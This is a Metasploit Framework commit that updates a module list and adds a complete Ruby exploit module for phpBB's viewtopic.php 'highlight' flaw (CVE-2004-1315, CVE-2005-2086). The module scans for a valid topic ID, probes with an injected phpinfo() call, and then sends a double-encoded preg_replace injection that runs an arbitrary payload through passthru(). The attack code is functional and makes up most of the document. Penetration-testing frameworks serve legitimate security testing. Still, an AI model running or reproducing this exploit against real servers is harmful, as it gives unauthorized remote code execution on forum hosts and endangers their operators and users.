phpBB2_highlight module port

git-svn-id: file:///home/svn/framework3/trunk@5432 4d416f70-5f16-0410-b530-b9f4589650da
2008-03-05 09:42:57 +00:00 · 2008-03-05 09:42:57 +00:00 · 1f7eb2147f
parent c546d6ec9c
commit 1f7eb2147f
2 changed files with 133 additions and 2 deletions
--- a/documentation/metasploit2/exploits.txt
+++ b/documentation/metasploit2/exploits.txt
@ -9,7 +9,6 @@ Unfinished modules
 	hpux_ftpd_preauth_list
 	iis_source_dumper
 	lyris_attachment_mssql
-	phpbb_highlight
 	phpnuke_search_module
 	realvnc_41_bypass
 	samba_trans2open
@ -17,7 +16,6 @@ Unfinished modules
 	smb_sniffer
 	solaris_kcms_readfile
 	solaris_snmpxdmid
-	sphpblog_file_upload
 	sybase_easerver
 	sygate_policy_manager
 	uow_imap4_copy
@ -120,6 +118,7 @@ Completed modules
 	php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
 	php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
 	php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
+	phpbb_highlight exploit/unix/webapp/phpbb_highlight
 	poptop_negative_read exploit/linux/pptp/poptop_negative_read
 	privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
 	putty_ssh exploit/windows/ssh/putty_msg_debug
@ -144,6 +143,7 @@ Completed modules
 	solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
 	solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
 	solaris_ttyprompt exploit/solaris/telnet/ttyprompt
+	sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
 	squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
 	svnserve_date exploit/multi/svn/svnserve_date
 	tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
--- a/modules/exploits/unix/webapp/phpbb_highlight.rb
+++ b/modules/exploits/unix/webapp/phpbb_highlight.rb
@ -0,0 +1,131 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Unix::Webapp::PHPBB_Highlight < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'phpBB viewtopic.php Arbitrary Code Execution',
+			'Description'    => %q{
+					This module exploits two arbitrary PHP code execution flaws in the
+					phpBB forum system. The problem is that the 'highlight' parameter
+					in the 'viewtopic.php' script is not verified properly and will
+					allow an attacker to inject arbitrary code via preg_replace().
+			},
+			'Author'         => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '11719'],
+					[ 'OSVDB', '17613'],
+					[ 'CVE', '2005-2086'],
+					[ 'CVE', '2004-1315'],
+					[ 'BID', '14086'],
+					[ 'BID', '10701'],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 1024,
+				},
+			'Platform'       => 'unix',
+			'Arch'           => ARCH_CMD,
+			'Targets'        => 
+				[
+					[ 'Automatic', 		{ }],
+					[ 'phpbb <=2.0.10', 	{ }],
+					[ 'phpbb <=2.0.15', 	{ }],
+				],
+			'DisclosureDate' => 'Nov 12 2004',
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
+					OptString.new('TOPIC', [false, "The ID of a valid topic"]),
+				], self.class)
+	end
+
+	def find_topic
+
+		1.upto(32) do |x|
+
+		res = send_request_raw({
+			'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
+		}, 25)
+
+		if (res and res.body.match(/class="postdetails"/))
+			print_status("Discovered valid topic ID: #{x}")
+			return x
+		end
+
+		end
+		return false
+
+	end
+
+	def exploit
+
+		topic = datastore['TOPIC'] || find_topic
+
+		if !(topic)
+			print_status("No valid topic ID found, please specify the TOPIC option.")
+			return
+		else
+
+			sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
+
+			case target.name
+			when /Automatic/
+				req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
+
+				res = send_request_raw({
+				'uri'	=> datastore['URI'] + req
+				}, 25)
+
+				print_status("Trying to determine which attack method to use...")
+
+				if (res and res.body =~ /\<title>phpinfo/)
+					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
+					sploit << "%2527%252epassthru(#{byte})%252e%2527"
+				else
+					byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
+					sploit << "%27.passthru(#{byte}).%27"
+				end
+
+			when /2\.0\.10/
+				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
+				sploit << "%2527%252epassthru(#{byte})%252e%2527"
+			when /2\.0\.15/
+				byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
+				sploit << "%27.passthru(#{byte}).%27"
+			end
+
+			res = send_request_raw({
+			'uri'	=> sploit
+			}, 25)
+
+		end
+
+	end
+
+end
+end
+
+